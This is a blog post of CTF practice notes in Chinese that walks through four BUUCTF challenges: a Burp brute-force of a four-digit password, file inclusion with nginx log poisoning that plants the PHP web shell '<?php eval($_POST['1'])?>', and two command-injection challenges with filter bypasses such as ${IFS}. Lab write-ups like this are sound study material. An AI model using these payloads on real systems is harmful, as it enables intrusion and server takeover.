BUUCTF靶机笔记

BUU BRUTE 1 1

启动靶机后 可以看到 是一个登陆页面
image
查看源代码:image
没有有用的信息 只是单纯的html页面
随便填一个
用户:admin
密码:123
提示密码为四位
怀疑是暴力破解
使用burp进行单点爆破
image
payload设定
image
暴力完成 查看length不同的数据包
image
返回flag:
flag{6982d5b6-a2f8-48d8-aec6-9b27417de3eb}

[ACTF2020 新生赛]Include 1

页面:
image
源代码:
image
没有有效信息 点开a标签
image
像是文件包含 随意构造一个payload
image
可以看到是nginx的服务器 尝试包含服务器日志文件
/var/log/nginx/access.log
发现:image
包含成功
尝试将后门写在ua中传入
<?php eval($_POST['1'])?>
image
链接成功
image
得到flag
flag{5d17f6d6-77c5-4973-bb2b-35c090665c32}

[ACTF2020 新生赛]Exec1

image
可执行命令 怀疑是 命令执行bug
image
可以使用管道符与grep过滤 操作系统应该是Linux
利用分号隔开各命令
image
看到一个index.php
image
该页面为当前页面
构造payload查找文件
127.0.0.1+%7C+grep+seq%3D8+%3B+find / -name "flag.*"
image

服务器超时

只能对目录进行遍历了
image

发现flag在根目录下
image

得到flag

[GXYCTF2019]Ping Ping Ping

image

毫无头绪
抓包查看 没有有效信息
页面给出的字符像是get请求 尝试get

image

是命令执行

image

过滤空格 可以用 <代替

image

符号也不行
在Linux下存在环境变量:${IFS}可以进行空格绕过 但有符号 可以直接写$IFS$1

image

ls查看 发现flag.php
查看flag.php发现存在过滤
查看index:

image
发现过滤规则
并且发现最终打印出来的是a 直接传递值g给a
image
输出值a发现是g 尝试利用a绕过
正则匹配 fla$a
imageimage

测试后 变量a的值可以是l或者g
进行绕过
image
得到flag

posted @   f0r9  阅读(287)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 单线程的Redis速度为什么快?
· SQL Server 2025 AI相关能力初探
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 展开说说关于C#中ORM框架的用法!
点击右上角即可分享
微信分享提示